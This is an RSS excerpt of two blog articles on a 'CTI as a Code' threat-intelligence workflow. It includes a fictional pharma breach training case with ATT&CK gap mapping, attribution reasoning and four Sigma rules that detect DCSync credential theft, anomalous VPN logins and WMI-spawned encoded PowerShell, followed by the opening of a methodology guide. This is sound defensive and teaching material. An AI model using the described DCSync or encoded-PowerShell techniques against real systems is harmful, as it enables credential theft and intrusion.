project.yml PIR status</h4><p>When a PIR is answered, open project.yml and change the status field immediately:</p><pre>nano project.yml</pre><p>Change:</p><pre>- id: PIR-001<br>    status: open</pre><p>To:</p><pre>- id: PIR-001<br>    status: answered    # CL-003 — exfiltration confirmed, 381 MB, Nov 6</pre><h4>4. Commit the claims ledger</h4><pre>git add 03-analysis/claims/claims-ledger.md project.yml<br>git commit -m "PROJ-2024-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003 exfil confirmed); PIR-003 CONFIRMED ONGOING (CL-006 DCSync)"</pre><h3>Step R4: ATT&amp;CK Mapping — Where Detection Failed</h3><h4>1. Open the ATT&amp;CK mapping file</h4><pre>nano 03-analysis/attck-mapping/attck-mapping.md</pre><p>For each technique you identified in the timeline, add one row. The four columns that matter most operationally are: <strong>Confidence</strong> (how sure are you the technique was used), <strong>Rule Fired?</strong> (yes/no/partial — check your SIEM), and <strong>Gap Type</strong> (what kind of work is needed to close this detection hole).</p><p><strong>Gap types:</strong> Rule missing / Data source missing / Coverage incomplete / Architectural gap. Pick one. If you are unsure, write your best guess and flag it for SOC review.</p><p>Also update project.yml — fill the attck_techniques list:</p><pre>nano project.yml</pre><pre>scope:<br>  attck_techniques:<br>    - T1566.001<br>    - T1557<br>    - T1133<br>    - T1078.002<br>    - T1059.001<br>    - T1003.001<br>    - T1003.006<br>    - T1021.003<br>    - T1197<br>    - T1047<br>    - T1070.001<br>    - T1547.001</pre><h4>2. Fill one row per technique</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k61svPS7k5oRag9OCWIk4w.png"></figure><p><strong>T1566.001 — Phishing attachment, CFO </strong><strong>.xlsm</strong></p><ul><li><strong>Evidence:</strong> M365 ATP log</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> Partial — ATP delivered; SCL=4, threshold=5</li><li><strong>Gap Type:</strong> Coverage incomplete — SCL threshold tuning</li></ul><p><strong>T1557 — AiTM credential theft, IT admin</strong></p><ul><li><strong>Evidence:</strong> VPN login pattern + AiTM HTML lure</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — no AiTM session token detection</li></ul><p><strong>T1133 — VPN access with stolen credentials</strong></p><ul><li><strong>Evidence:</strong> VPN log: Istanbul, off-hours, no prior history</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — no anomalous VPN authentication alert</li></ul><p><strong>T1078.002 — Valid account abuse, </strong><strong>svc_backup</strong></p><ul><li><strong>Evidence:</strong> EID 4624, multiple events</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — service account off-hours logon undetected</li></ul><p><strong>T1059.001 — Encoded PowerShell, both hosts</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 1, CrowdStrike</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> Yes, CFO only, via CrowdStrike behavioral detection</li><li><strong>Gap Type:</strong> Coverage incomplete — CFO only; IT admin host fired no alert</li></ul><p><strong>T1003.001 — LSASS memory access</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 10, GrantedAccess 0x1010</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — Sysmon EID 10 not alerted on</li></ul><p><strong>T1003.006 — DCSync</strong></p><ul><li><strong>Evidence:</strong> DC01 EID 4662</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — EID 4662 audit configured but no alert rule</li></ul><p><strong>T1021.003 — WMI lateral movement to </strong><strong>SERVER-FIN-01</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike: WmiPrvSE → PowerShell</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — WmiPrvSE parent alert not deployed</li></ul><p><strong>T1197 — BITS download, second stage</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 1, bitsadmin</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — BITS external download not monitored</li></ul><p><strong>T1047 — WMI execution, lateral movement</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike log</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Data source missing — WMI logging not in SIEM</li></ul><p><strong>T1070.001 — Event log cleared</strong></p><ul><li><strong>Evidence:</strong> CrowdStrike EID 1102</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Rule missing — wevtutil alert not deployed</li></ul><p><strong>T1547.001 — Registry Run Key persistence</strong></p><ul><li><strong>Evidence:</strong> Sysmon EID 13</li><li><strong>Confidence:</strong> High</li><li><strong>Rule Fired?:</strong> <strong>No</strong></li><li><strong>Gap Type:</strong> Coverage incomplete — EID 13 ingested but no alert rule on AppData\\Roaming paths</li></ul><p><strong>The gap taxonomy tells the engineering team exactly what work is required:</strong></p><ul><li><strong>Rule missing (7 techniques):</strong> Data is in SIEM. A detection engineer can write and deploy the rule. These are sprint items.</li><li><strong>Coverage incomplete (3 techniques):</strong> Rule or data exists but is mis-tuned or partial. These require tuning, not new infrastructure.</li><li><strong>Data source missing (1 technique):</strong> WMI execution logging is not in the SIEM. This requires an infrastructure change before rules can be written.</li></ul><p>The DCSync gap (T1003.006) is particularly stark: the Advanced Audit Policy that generates EID 4662 was correctly configured on DC01, the event was forwarded to Splunk, and the event was visible in Splunk. There was no alert rule. A single Splunk search rule on source=WinEventLog:Security EventCode=4662 ObjectType="{19195a5b-6da0-11d0-afd3-00c04fd930c9}" from a non-DC IP would have fired and contained this incident before the formula exfiltration.</p><h4>3. Commit the ATT&amp;CK mapping</h4><pre>git add 03-analysis/attck-mapping/attck-mapping.md project.yml<br>git commit -m "PROJ-2024-001: ATT&amp;CK mapping — 12 techniques, 7 rule-missing, 3 coverage-incomplete, 1 data-source-missing, 1 arch-gap"</pre><h3>Step R5: Attribution Assessment — Same Actor or Two?</h3><h4>1. Open the attribution file</h4><pre>nano 03-analysis/attribution/attribution.md</pre><p>Write attribution <strong>only after the claims ledger is complete</strong>. The attribution file has three sections: evidence for unification (or separation), confidence ladder scoring, and the exact language to use in deliverables. Fill them in that order.</p><p><strong>Do not start with a hypothesis.</strong> Start with the evidence you have from the claims ledger, then see where it points.</p><h4>2. Score the evidence against the confidence ladder</h4><p>The investigation faces a key analytical question: Path A (CFO phishing, November 15) and Path B (IT admin AiTM, October 22) — are they the same actor?</p><p><strong>Evidence for unification (same actor):</strong></p><ol><li><strong>Shared PE compile timestamp:</strong> Both dropped binaries — svchost32.exe (CFO host) and UpdateHelper.dll (IT admin host) — carry an identical fake compile timestamp of 2018-04-09. This is a known toolchain fingerprint. The probability of two unrelated actors both timestomping to the same date is extremely low.</li><li><strong>Shared secondary C2 domain in memory:</strong> Strings extracted from svchost32.exe include sys-update-cdn[.]net — the domain that appeared only in SERVER-RD-02's DNS logs during the formula exfiltration. The CFO's implant knew about infrastructure used during the Path B operation. This is only explicable if the same actor controlled both implants.</li><li><strong>Coordinated operations timeline:</strong> The CFO was targeted on the same day that the finance server data was being staged on SERVER-FIN-01 via lateral movement from the IT admin path. Two independent actors staging finance data simultaneously at the same target is implausible.</li></ol><p><strong>Assessment: Single threat actor, dual delivery mechanism.</strong></p><p>The actor compromised the IT admin first (October 22), used that access for data theft (November 6), then independently targeted the CFO to expand access to finance data. The two phishing lures used different delivery infrastructure (different sender domains, different sending IPs from the same /24 block) — consistent with an actor who maintains parallel operational tracks.</p><p><strong>Attribution confidence: Medium-High.</strong> Apply the confidence ladder from Step R5 of the methodology to score this case:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rrKN1yNFJL_eINzt_iec9A.png"></figure><p><strong>Ladder tier: Medium-High</strong> — TTP overlap + infrastructure match present; independent confirmation absent. The toolset has not been definitively matched to a named cluster, which prevents elevation to High.</p><p><strong>What to write:</strong> <em>“Activity assessed as a single threat actor based on shared toolchain indicators (PE timestamp, secondary C2 domain). Tradecraft and targeting profile are consistent with Iranian-nexus industrial espionage operations targeting Israeli pharmaceutical IP. Attribution to a named cluster is not warranted without CERT-IL deconfliction or independent confirmation. Confidence: Medium-High.”</em></p><h4>3. Paste the final language into attribution.md and commit</h4><pre>git add 03-analysis/attribution/attribution.md<br>git commit -m "PROJ-2024-001: attribution — single actor, Medium-High confidence, shared PE timestamp + secondary C2, Iranian-nexus tradecraft consistent"</pre><h3>Step R6: Detection Rules — Four That Would Have Changed the Outcome</h3><h4>1. Create one file per rule</h4><p>Each rule gets its own file in 04-detections/sigma/:</p><pre>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-001-anomalous-vpn-auth.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-002-dcsync-non-dc.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-003-svc-account-offhours.yml<br>cp 04-detections/sigma/SIGMA-TEMPLATE.yml 04-detections/sigma/DET-004-wmiprvse-powershell.yml</pre><p>Open the first one:</p><pre>nano 04-detections/sigma/DET-001-anomalous-vpn-auth.yml</pre><p>Every rule must reference the CL-ID it would have detected and the gap type it closes. That is how the detection backlog stays traceable to the investigation.</p><h4>2. Fill each rule</h4><p>Each rule is written with a reference to the claim it would have detected and the evidence gap it closes.</p><p><strong>DET-001: Anomalous VPN Authentication from Non-Corporate Source</strong></p><pre>title: Anomalous VPN Authentication — New Geography or Hosting ASN<br>id: a1b2c3d4-5678-9abc-def0-1234567890ab<br>status: experimental<br>description: &gt;<br>  Detects VPN authentication success from a source IP with no prior history for<br>  this user, specifically from IPs geolocated outside Israel or from hosting/VPN<br>  ASNs. Covers T1133 and T1557 (session token replay after AiTM interception).<br>  Derived from PROJ-001 — CL-001, p.levi VPN from Istanbul at 02:17 UTC.<br>logsource:<br>  category: network<br>  product: cisco_anyconnect<br>detection:<br>  selection:<br>    event.action: vpn_auth_success<br>    user.name|exists: true<br>  filter_known:<br>    source.geo.country_iso_code: 'IL'<br>    source.as.number|not|startswith: ['AS47583', 'AS16276']   # hosting VPS ASNs<br>  condition: selection and not filter_known<br>falsepositives:<br>  - Legitimate international travel — validate against HR travel records<br>  - Remote contractors working abroad<br>level: high<br>tags:<br>  - attack.initial_access<br>  - attack.t1133<br>  - attack.credential_access<br>  - attack.t1557</pre><p><strong>DET-002: DCSync Attack Detection</strong></p><pre>title: DCSync Attack via Non-DC Account<br>id: b2c3d4e5-6789-abcd-ef01-234567890abc<br>status: production<br>description: &gt;<br>  Detects DCSync by looking for EID 4662 with the DS-Replication-Get-Changes<br>  GUID originating from a workstation IP rather than a domain controller.<br>  Derived from PROJ-001 — CL-004: svc_backup performed DCSync from WS-IT-LEVI<br>  using Domain Admin rights that were never revoked after an August 2024 <br>  emergency backup restoration.<br>logsource:<br>  category: windows<br>  product: windows<br>  service: security<br>detection:<br>  selection:<br>    EventID: 4662<br>    ObjectType: '{19195a5b-6da0-11d0-afd3-00c04fd930c9}'   # DS-Replication-Get-Changes<br>    Properties|contains:<br>      - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'             # DS-Replication-Get-Changes-All<br>      - '89e95b76-444d-4c62-991a-0facbeda640c'             # DS-Replication-Get-Changes-In-Filtered-Set<br>  filter_legitimate_dc:<br>    IpAddress|startswith:<br>      - '10.10.1.10'   # DC01 — add all DC IPs here<br>      - '10.10.1.11'   # DC02<br>  condition: selection and not filter_legitimate_dc<br>falsepositives:<br>  - Azure AD Connect sync account — must be explicitly whitelisted<br>  - Authorized red team / pentest — validate scope before dismissing<br>level: critical<br>tags:<br>  - attack.credential_access<br>  - attack.t1003.006</pre><p><strong>DET-003: Service Account Off-Hours Authentication</strong></p><pre>title: Service Account Authentication Outside Business Hours<br>id: c3d4e5f6-789a-bcde-f012-34567890abcd<br>status: experimental<br>description: &gt;<br>  Detects authentication by a service account (accounts matching svc_* naming<br>  pattern) outside business hours (22:00–06:00) to a non-designated system.<br>  Covers T1078.002 (Valid Accounts: Domain Accounts) for svc_backup lateral<br>  movement in PROJ-001.<br>logsource:<br>  category: windows<br>  product: windows<br>  service: security<br>detection:<br>  selection:<br>    EventID: 4624<br>    LogonType: 3<br>    SubjectUserName|startswith: 'svc_'<br>  filter_business_hours:<br>    TimeCreated|windash|lt: '22:00:00'<br>    TimeCreated|windash|gt: '06:00:00'<br>  filter_known_backup_host:<br>    IpAddress: '10.10.4.15'   # SERVER-WSUS-01 — legitimate backup source<br>  condition: selection and not filter_business_hours and not filter_known_backup_host<br>falsepositives:<br>  - Scheduled tasks that legitimately run at night — review and whitelist specific pairs<br>level: medium<br>tags:<br>  - attack.lateral_movement<br>  - attack.t1078.002</pre><p><strong>DET-004: WmiPrvSE Spawning PowerShell</strong></p><pre>title: WMI Remote Execution — PowerShell Child of WmiPrvSE<br>id: d4e5f6a7-89ab-cdef-0123-4567890abcde<br>status: production<br>description: &gt;<br>  Detects WMI-based lateral movement (T1021.003) where WmiPrvSE.exe spawns<br>  PowerShell on a remote system. This is the pattern from PROJ-001 step 16:<br>  lateral movement from WS-CFO-01 to SERVER-FIN-01 via WMI using svc_finreport<br>  credentials. CrowdStrike detected the PowerShell on SERVER-FIN-01 but the<br>  originating WMI connection from the CFO host had no coverage.<br>logsource:<br>  category: process_creation<br>  product: windows<br>detection:<br>  selection:<br>    ParentImage|endswith: '\WmiPrvSE.exe'<br>    Image|endswith: '\powershell.exe'<br>  suspicious_flags:<br>    CommandLine|contains:<br>      - '-Enc'<br>      - '-EncodedCommand'<br>      - '-NonI'<br>      - '-W Hidden'<br>  condition: selection and suspicious_flags<br>falsepositives:<br>  - SCCM WMI-based software deployment with PowerShell post-install scripts<br>level: high<br>tags:<br>  - attack.lateral_movement<br>  - attack.execution<br>  - attack.t1021.003<br>  - attack.t1059.001</pre><p><strong>Validation:</strong> All four rules were validated against the PROJ-001 evidence set using Hayabusa before deployment. DET-001 fires on the October 24 Istanbul VPN login. DET-002 fires on the November 6 DCSync event. DET-003 fires on every svc_backup off-hours logon. DET-004 fires on the SERVER-FIN-01 WMI execution.</p><h4>3. Validate each rule against your evidence set</h4><pre># Run Hayabusa against the collected logs to confirm rules fire on known-bad events<br>hayabusa csv-timeline -d 01-evidence/ -r 04-detections/sigma/ -o validation-results.csv</pre><p>Review the output. A rule that does not fire on its own evidence set should not be deployed.</p><h4>4. Update project.yml deliverables count and commit</h4><pre>nano project.yml</pre><pre>deliverables:<br>  - type: sigma-rules<br>    count: 4<br>    status: complete</pre><pre>git add 04-detections/sigma/ project.yml<br>git commit -m "PROJ-2024-001: detections — DET-001 to DET-004 written and validated PASS against evidence set via Hayabusa"</pre><h3>Step R7: Deliverables — What Each Stakeholder Gets</h3><h4>1. Open the deliverable templates</h4><pre>nano 05-deliverables/executive-brief.md<br>nano 05-deliverables/soc-handoff.md</pre><p>The executive brief answers three questions only: what happened, what was confirmed stolen or compromised, and what must happen in the next 24 hours. One page. No technical jargon. Every PIR that is answered gets a one-line answer at the top.</p><p>The SOC handoff lists: current IOCs (with confidence ratings), detection rules deployed, hunting queries still open, and escalation criteria. The SOC receives this, not the executive brief.</p><blockquote>2. Fill the executive brief</blockquote><p><strong>Executive brief (1 page, TLP:AMBER) — what the CISO needs in 90 minutes:</strong></p><blockquote><em>An adversary assessed as Iranian-nexus compromised LifeTech Pharma through two separate phishing attacks over 24 days. Using stolen IT administrator credentials, they accessed and exfiltrated the 47-file US licensing formula package on November 6, 2024. They also performed a DCSync attack on the domain controller, which means all Active Directory credentials must be treated as compromised.</em></blockquote><blockquote><strong><em>PIR-001 ANSWERED:</em></strong><em> The US partner formula package was exfiltrated. 381 MB outbound confirmed in firewall logs.</em></blockquote><blockquote><strong><em>PIR-003 ANSWERED:</em></strong><em> Active compromise ongoing. The CFO alert on November 15 is a second wave from the same actor, still active at time of investigation.</em></blockquote><blockquote><strong><em>Immediate actions:</em></strong><em> Full AD credential rotation; quarantine WS-CFO-01 and SERVER-FIN-01; notify INCD (72h clock from discovery: expires November 17 02:14 IST); brief the US licensing partner.</em></blockquote><p><strong>SOC handoff (technical):</strong></p><p>Current IOCs: 203.0.113.87, 198.51.100.44, telemetry-cdn-services[.]biz, sys-update-cdn[.]net, uslifepartner-group[.]com, lifetechpharma-corp[.]eu.</p><p>Four detection rules deployed (DET-001 through DET-004). Two hunting queries: (1) pivot on C2 domains across all 838 endpoints — the 3 confirmed hosts may not be all; (2) hunt for any svc_backup authentication from non-WSUS IPs in the past 30 days.</p><h4>3. Update project.yml status to closed and commit everything</h4><pre>nano project.yml</pre><pre>project:<br>  status: closed<br>pirs:<br>  - id: PIR-001<br>    status: answered    # CL-003<br>  - id: PIR-002<br>    status: answered    # CL-001<br>  - id: PIR-003<br>    status: answered    # CL-006 - ongoing, AD rotation required</pre><pre>git add 05-deliverables/ project.yml<br>git commit -m "PROJ-2024-001: deliverables — executive brief, SOC handoff, INCD notification ready; all PIRs answered; project closed"</pre><h3>The Git History: What a Completed Investigation Looks Like</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9m5xzm1v4yUoNN47GznubQ.png"></figure><pre>b9a2f1c  PROJ-001: deliverables — executive brief, SOC handoff, INCD notification ready<br>7c8d3e4  PROJ-001: detections — DET-001 through DET-004 validated PASS via Hayabusa<br>5f2a9b1  PROJ-001: attribution — single actor assessed (shared PE timestamp + secondary C2)<br>3e4c7d8  PROJ-001: ATT&amp;CK mapping — 12 techniques, 7 rule-missing, 3 incomplete, 1 data-missing<br>1b6f2a5  PROJ-001: claims — 6 claims; PIR-001 ANSWERED YES (CL-003); PIR-003 CONFIRMED ONGOING (CL-006)<br>9a3e7c2  PROJ-001: timeline — 18 events Oct 22–Nov 15; dual-path confirmed, same actor assessed<br>6f1b4d9  PROJ-001: evidence inventory — 6 sources, GAP-001 documented, firewall log retrieval urgent<br>2c8a5e3  PROJ-001: scope — signed off 22:55 IST; PIR-001/002/003, TLP AMBER, legal hold WS-IT-LEVI<br>a1d7f4b  PROJ-001: intake — CFO PowerShell alert, legal hold WS-IT-LEVI, formula data in scope<br>0e9c2b7  PROJ-001: scaffold initialized</pre><p>Each commit is a phase. Each message states the project ID, the phase, and a one-line summary of what was concluded. When a lawyer asks six months from now “what did you know and when did you know it?” — the git log answers.</p><h3>Key Lessons</h3><p><strong>The alert was not the beginning.</strong> The SOC received its first signal 52 hours after the breach was already in progress — and 15 days after the formula files were gone. The triggering alert was the second entry point. A detection rule on anomalous VPN authentication (DET-001) would have fired on October 24 at 02:17 UTC — before any lateral movement, before any data access.</p><p><strong>Gaps are findings, not absences.</strong> The 10-day Sysmon gap on WS-IT-LEVI coincided exactly with the delivery of a phishing email. Stopping a logging service is T1562.001 — Impair Defenses. A gap is not “we don’t know what happened.” A gap that coincides with a malicious delivery is evidence of anti-forensics.</p><p><strong>DCSync changes everything.</strong> The scope of remediation is not “three infected hosts.” When DCSync is confirmed via Domain Admin rights, every credential in the AD is potentially compromised. The scope is all 80 servers. The IR Lead needs to know this before the 90-minute CISO brief, not after.</p><p><strong>Claims need competing hypotheses.</strong> CL-003 (exfiltration confirmed) is only defensible as “high confidence” because specific alternative explanations were checked and explicitly ruled out — scheduled backup (wrong source IP, wrong timing), authorized developer activity (no jobs scheduled). Without the competing hypothesis analysis, a claim is an assertion. With it, it is analysis.</p><p><em>This scenario is training assignment A01 from the </em><a href="https://github.com/anpa1200/CTI_as_a_Code"><em>CTI as a Code repository</em></a><em>. The full evidence set, template, and worked solution are available there.</em></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><p><strong>Andrey Pautov</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=3e6574b7b85f" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/cti-as-a-code-in-practice-reactive-investigation-lifetech-pharma-3e6574b7b85f">CTI as a Code in Practice: Reactive Investigation — LifeTech Pharma</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CTI as a Code: Complete Step-by-Step Methodology]]></title>
<description><![CDATA[Version-controlled threat intelligence — from first call to deployed Sigma rule.Why This Methodology ExistsMost CTI work degrades in three predictable ways:The evidence problem. An analyst writes “the adversary used T1078” in a report. Six months later nobody can answer: what log line supports th...]]></description>
<link>https://tsecurity.de/de/3580442/hacking/cti-as-a-code-complete-step-by-step-methodology/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580442/hacking/cti-as-a-code-complete-step-by-step-methodology/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:20 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4><strong>Version-controlled threat intelligence — from first call to deployed Sigma rule.</strong></h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ygo9Os6SaZrumCm_Y08aKA.png"></figure><h3>Why This Methodology Exists</h3><p>Most CTI work degrades in three predictable ways:</p><p><strong>The evidence problem.</strong> An analyst writes “the adversary used T1078” in a report. Six months later nobody can answer: what log line supports that claim? Was it confirmed or inferred? What alternative hypotheses were ruled out? The claim exists in a PDF but the reasoning is gone.</p><p><strong>The detection problem.</strong> A detection rule gets written after an incident. It sits in the SIEM with no documentation of which adversary technique it covers, which evidence motivated it, or whether it was ever validated. When the technique evolves, nobody knows which rules to update.</p><p><strong>The institutional knowledge problem.</strong> The analyst who ran the investigation leaves. The entire understanding of what happened, how it was analyzed, and what was decided goes with them. The next incident starts from zero.</p><p>CTI as a Code solves all three. Every claim traces to evidence. Every detection traces to a technique. Every decision is a git commit. The investigation is reproducible by anyone with access to the repository.</p><h3>Contents</h3><ul><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#6784"><strong>Why This Methodology Exists</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#b46b"><strong>The Four Operational Modes</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#cb45"><strong>Setup: Get the Repository and Start the Lab</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#c53b"><strong>Step 1: Initial Information Gathering — Ask Before You Look</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#d265"><strong>Step 2: Create Your Project Folder from the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#36d3"><strong>Step 3: Scope the Project</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#335f"><strong>Reactive Mode</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#6db6"><strong>Step R1: Collect and Inventory Evidence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#5c1f"><strong>Step R2: Build the Timeline with Evidence Labels</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#5f05"><strong>Step R3: Claims Ledger</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#869b"><strong>Step R4: ATT&amp;CK Mapping with Gap Classification</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#a66f"><strong>Step R5: Attribution Assessment</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#f976"><strong>Step R6: Derive Sigma Rules for Every Missed Technique</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#5fa2"><strong>Step R7: Produce Deliverables</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#97d7"><strong>Proactive Mode</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#f071"><strong>Step P1: Copy the Template</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#c4a2"><strong>Step P2: Run the Intake</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#4a2d"><strong>Step P3: Assess Trigger Intelligence</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#7af0"><strong>Step P4: Crown Jewels Analysis</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#1f9b"><strong>Step P5: Model Attack Scenarios</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#f509"><strong>Step P6: Build the Detection Backlog</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#137b"><strong>Full Cycle Mode: Building a CTI Program</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#675c"><strong>Adversary Emulation Mode: Validating Coverage</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#ef34"><strong>Git Discipline — The Same for All Modes</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#8924"><strong>Minimum-Viable Path: No Lab Required</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#9250"><strong>The Ecosystem</strong></a></li><li><a href="https://infosecwriteups.com/cti-as-a-code-complete-step-by-step-methodology-dda5ef496a46#e265"><strong>Where to Start</strong></a></li></ul><h3>The Four Operational Modes</h3><p>Before picking up a tool, identify which mode you are in:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*09U-tRkFVOmP2S1zQVDk3A.png"></figure><p>The four modes share the same scaffold, the same analytical discipline, and the same git workflow. The difference is which steps you run and in what order.</p><h3>Setup: Get the Repository and Start the Lab</h3><h4>Clone the repository</h4><pre>git clone https://github.com/anpa1200/CTI_as_a_Code.git<br>cd CTI_as_a_Code</pre><p><strong>Repository structure:</strong></p><pre>CTI_as_a_Code/<br>├── docker-compose.yml          ← full lab stack (OpenCTI, TheHive, Elastic, Cortex)<br>├── .env.example                ← all secrets in one place; copy to .env before starting<br>├── scripts/<br>│   ├── setup.sh                ← first-time initialization (connectors, indexes, users)<br>│   └── health-check.sh         ← confirms all services return HTTP 200<br>├── templates/                  ← blank investigation scaffolds — copy these to start<br>│   ├── reactive/<br>│   ├── proactive/<br>│   ├── full-cycle/<br>│   └── adversary-emulation.md<br>└── training/                   ← 8 fully populated case folders with worked solutions<br>    ├── A01-reactive-lifetech/<br>    ├── A02-proactive-celltronx/<br>    └── ...</pre><h3>Start the lab (optional but recommended)</h3><pre>cp .env.example .env<br># Open .env and set all passwords before the next command<br>nano .env</pre><pre># Elasticsearch requires this kernel parameter<br>sudo sysctl -w vm.max_map_count=262144</pre><pre>docker compose up -d</pre><pre>./scripts/setup.sh          # runs once; configures MITRE ATT&amp;CK connector, indexes, initial users</pre><pre>./scripts/health-check.sh   # all services should return HTTP 200</pre><p>Once running:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nNaWz-7T0T3H17eNc7DeRA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6Vk-MOSzNyILrQqlDeMxTg.png"></figure><p>You do not need the lab to run the methodology. The minimum-viable path at the end of this article covers what to use instead.</p><h3>Step 1: Initial Information Gathering — Ask Before You Look</h3><p><strong>This is the step most analysts skip. It is the most important step.</strong></p><p>Before you open a log file, before you run a query, before you create a case — you need to understand what the reporter knows, what has already been touched, and what constraints exist. Getting this wrong means analyzing the wrong systems, missing the actual entry point, or tainting evidence that could later matter to regulators or legal.</p><p>This step applies to all modes:</p><ul><li><strong>Reactive</strong>: gather from the person who reported or discovered the incident</li><li><strong>Proactive</strong>: gather from the person who assigned the assessment (CISO, management, compliance)</li><li><strong>Full Cycle</strong>: gather from the sponsor of the program build</li><li><strong>Emulation</strong>: gather from the authorization chain</li></ul><p>Run this as a structured conversation — a call, a meeting, or a written intake form filled in by the requester. Take verbatim notes. Do not interpret or analyze during this step; just capture.</p><p>→ <strong>Reactive Investigation — Intake</strong> — full intake form, why each section matters, and how to commit the intake into the project git history.</p><h3>Step 2: Create Your Project Folder from the Template</h3><p>After 